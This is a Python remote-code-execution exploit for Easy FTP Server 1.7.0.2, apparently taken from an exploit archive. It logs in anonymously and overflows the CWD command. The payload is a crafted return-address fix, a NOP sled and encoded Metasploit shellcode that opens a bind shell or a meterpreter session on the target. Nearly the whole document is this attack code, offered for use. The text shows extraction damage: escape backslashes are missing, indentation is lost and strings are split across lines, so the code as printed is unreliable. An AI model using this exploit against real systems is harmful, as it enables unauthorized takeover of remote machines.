Home / os / winme

RCE_easy_ftp_server_1.7.0.2.py.txt

Posted on 01 March 2010

#!/usr/bin/env python
# RCE for Easy FTP Server 1.7.0.2 w/ RET overwrite
# app @ http://code.google.com/p/easyftpsvr/
# Copyright 2010 Paul Makowski, GPLv2
# explanation of technique: http://wp.me/pBV1X-3Q
# based on: http://seclists.org/bugtraq/2010/Feb/202
# version 0.1

import socket
from sys import exit
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-t", "--target", dest="target", metavar="TARGET", type="string", help="target IP address")
parser.add_option("-p", "--port", dest="port", metavar="PORT", type="string", help="target port")
(options, args) = parser.parse_args()

if not options.target: parser.error("Target unspecified.")
if not options.port: options.port = 21

# -- #

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
connect = s.connect((options.target, int(options.port)))
print "[+] connected"

except:
print "[-] connection failed"
exit(1)

# get to vulnerable code (post auth, defaults allow anon login)
s.recv(1024)
s.send("USER anonymous
")
s.recv(1024)
s.send("PASS anonymous
")
s.recv(1024)


### fixRet ###
# ret is located @ 0x009afe64 & needs to be replaced with part of our payload (or NOPs)
fixRet = (
"x31xc0" +                	# xor    %eax,%eax
"x31xdb" +                	# xor    %ebx,%ebx
"x31xc9" +                	# xor    %ecx,%ecx
"xb8xcex54x30xaa" +       	# mov    $0xaa3054ce,%eax
"xbbxaaxaaxaaxaa" +       	# mov    $0xaaaaaaaa,%ebx
"x31xd8" +                	# xor    %ebx,%eax (now %eax should hold 0x009AFE64)
#"xb9x90x90x90x90" +       	# mov    $0x90909090,%ecx (use this if your payload <= 233 bytes)
#"xb9x1ax29xebx0e" +       	# mov    $0xeeb291a,%ecx (4 bytes of bind_tcp payload to overwrite RET with)
"xb9x5fxe4xe0xae" +       	# mov    $0xaee0e45f,%ecx (4 bytes of meterpreter_bind_tcp payload to overwrite RET with)
"x89x08" )                	# mov    %ecx,(%eax)


### payloads ###
# $ ./msfpayload windows/shell_bind_tcp R | ./msfencode -b "x00x0ax0dxff"
# [*] x86/shikata_ga_nai succeeded with size 369 (iteration=1)
bind_tcp = (

# this will go before the RET location
"x33xc9xb1x56xd9xf6xd9x74x24xf4xbbxcbxf4x35" +
"xcbx58x31x58x15x83xe8xfcx03x58x11x29x01xc9" +
"x23x24xeax32xb4x56x62xd7x85x44x10x93xb4x58" +
"x52xf1x34x13x36xe2xcfx51x9fx05x67xdfxf9x28" +
"x78xeexc5xe7xbax71xbaxf5xeex51x83x35xe3x90" +
"xc4x28x0cxc0x9dx27xbfxf4xaax7ax7cxf5x7cxf1" +
"x3cx8dxf9xc6xc9x27x03x17x61x3cx4bx8fx09x1a" +
"x6cxaexdex79x50xf9x6bx49x22xf8xbdx80xcbxca" +
"x81x4exf2xe2x0fx8fx32xc4xefxfax48x36x8dxfc" +
"x8ax44x49x89x0exee" +

# these 4 bytes will be written over RET by fixRet
"x1ax29xebx0e" +

# this will go after the RET location
"xcexafx78x1c" +
"xbbxa4x27x01x3ax69x5cx3dxb7x8cxb3xb7x83xaa" +
"x17x93x50xd3x0ex79x36xecx51x25xe7x48x19xc4" +
"xfcxeax40x81x31xc0x7ax51x5ex53x08x63xc1xcf" +
"x86xcfx8axc9x51x2fxa1xadxcexcex4axcdxc7x14" +
"x1ex9dx7fxbcx1fx76x80x41xcaxd8xd0xedxa5x98" +
"x80x4dx16x70xcbx41x49x60xf4x8bxfcxa7x3axef" +
"xacx4fx3fx0fx42xd3xb6xe9x0exfbx9exa2xa6x39" +
"xc5x7ax50x42x2fxd7xc9xd4x67x31xcdxdbx77x17" +
"x7dx70xdfxf0xf6x9axe4xe1x08xb7x4cx6bx31x5f" +
"x06x05xf3xfex17x0cx63x63x85xcbx74xeaxb6x43" +
"x22xbbx09x9axa6x51x33x34xd5xa8xa5x7fx5dx76" +
"x16x81x5fxfbx22xa5x4fxc5xabxe1x3bx99xfdxbf" +
"x95x5fx54x0ex4cx09x0bxd8x18xccx67xdbx5exd1" +
"xadxadxbfx63x18xe8xc0x4bxccxfcxb9xb6x6cx02" +
"x10x73x9cx49x39xd5x35x14xabx64x58xa7x01xaa" +
"x65x24xa0x52x92x34xc1x57xdexf2x39x25x4fx97" +
"x3dx9ax70xb2x34" )


# $ ./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -b "x00x0ax0dxffx2fx5c"
# [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
meterpreter_bind_tcp = (

# this will go before the RET location
"xbfxddx9fx97x4fx29xc9xb1x4bxdaxc2xd9x74x24" +
"xf4x5dx31x7dx11x03x7dx11x83xedxfcxe2x28x63" +
"x7fxc6xd2x9cx80xb9x5bx79xb1xebx3fx09xe0x3b" +
"x34x5fx09xb7x18x74x9axb5xb4x7bx2bx73xe2xb2" +
"xacxb5x2ax18x6exd7xd6x63xa3x37xe7xabxb6x36" +
"x20xd1x39x6axf9x9dxe8x9bx8exe0x30x9dx40x6f" +
"x08xe5xe5xb0xfd"

# these 4 bytes will be written over RET by fixRet
"x5fxe4xe0xae" +

# this will go after the RET location
"xd4xaex18xc4xb3" +
"x0ex18x09xa0x72x53x26x13x01x62xeex6dxeax54" +
"xcex22xd5x58xc3x3bx12x5ex3cx4ex68x9cxc1x49" +
"xabxdex1dxdfx29x78xd5x47x89x78x3ax11x5ax76" +
"xf7x55x04x9bx06xb9x3fxa7x83x3cxefx21xd7x1a" +
"x2bx69x83x03x6axd7x62x3bx6cxbfxdbx99xe7x52" +
"x0fx9bxaax3axfcx96x54xbbx6axa0x27x89x35x1a" +
"xafxa1xbex84x28xc5x94x71xa6x38x17x82xefxfe" +
"x43xd2x87xd7xebxb9x57xd7x39x6dx07x77x92xce" +
"xf7x37x42xa7x1dxb8xbdxd7x1ex12xd6x29x3bxce" +
"xb1x4bxbbxe0x1dxc5x5dx68x8ex83xf6x05x6cxf0" +
"xcfxb2x8fxd2x7cx6ax18x6ax6bxacx27x6bxbex9e" +
"x84xc3x28x55xc7xd7x49x6axc2x7fx1exfdx98x11" +
"x6dx9fx9dx3bx07x5fx08xc0x81x08xa4xcaxf4x7f" +
"x6bx34xd3x0bxa2xa0x9bx63xcbx24x1bx74x9dx2e" +
"x1bx1cx79x0bx48x39x86x86xfdx92x13x29x57x46" +
"xb3x41x55xb1xf3xcdxa6x94x05x31x71xd1x83x43" +
"xf4x31x48xa1" )


#-----------------------attack string------------------------
# retFix | nopsled | payload, part 1 | ret | payload, part 2
#------------------------------------------------------------
print "[*] building attack string"

ret = "x58xFDx9Ax00" # 0x009AFD58; taken
beforeRetSize = 268
afterRetSize = 233
payload = meterpreter_bind_tcp # switch this to bind_tcp if you wish to use this payload

# put retFix in our attack string
attackString = fixRet
print "	[*] added fixRet function; attackString is " + str(len(attackString)) + " bytes long"

# append enough NOPs to hit either the beginning of the payload or the location of ret
if len(payload) <= afterRetSize + 4: # payload will not occupy any space before ret
attackString += "x90" * (beforeRetSize - len(fixRet))
print "	[*] payload fits beyond RET location; added a NOP sled to RET location; attackString is " + str(len(attackString)) + " bytes long"

else: # payload will occupy space before ret
attackString += "x90" * (beforeRetSize - len(fixRet) - (len(payload) - afterRetSize - 4))
print "	[*] payload doesn't fit beyond RET location; adding a NOP sled to first part of payload; attackString is " + str(len(attackString)) + " bytes long"

# if the payload will not fit beyond the ret, some needs to be written before the ret
attackString += payload[:len(payload) - afterRetSize - 4]
print "	[*] added first part of payload; attackString is " + str(len(attackString)) + " bytes long"

# the ret
attackString += ret
print "	[*] added RET value; attackString is " + str(len(attackString)) + " bytes long"

# append enough NOPs to hit the payload (only if payload is smaller than afterRetSize)
if len(payload) <= afterRetSize:
attackString += "x90" * afterRetSize - len(payload) + payload
print "	[*] payload fits beyond RET location; added a NOP sled and payload; attackString is " + str(len(attackString)) + " bytes long"

else:
attackString += payload[len(payload) - afterRetSize:]
print "	[*] payload doesn't fit beyond RET location; adding second part of payload; attackString is " + str(len(attackString)) + " bytes long"

### exploit ###
# at this point, attackString should be 505 bytes long
print "[*] sending attack string..."
s.send('CWD ' + attackString + '
')
print "[+] attach string sent.  payload should have executed."
s.close()

 

TOP

Malware :

Exploits :